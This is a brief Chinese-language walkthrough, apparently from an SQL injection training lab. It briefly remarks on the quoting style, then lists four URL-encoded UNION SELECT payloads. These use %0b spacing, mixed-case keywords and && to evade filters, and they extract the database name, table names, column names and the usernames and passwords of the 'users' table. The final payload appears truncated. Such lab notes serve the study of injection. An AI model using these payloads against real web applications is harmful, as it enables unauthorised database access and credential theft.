1.不知道为什么,明明写着是有括号的双引号字符型,却变成了单引号;
2.爆破:
(1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1
(2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b('1')=('1
(3)爆列名:?id=0')%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b('1')=('1
(4)爆值?id=0')%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),('(3
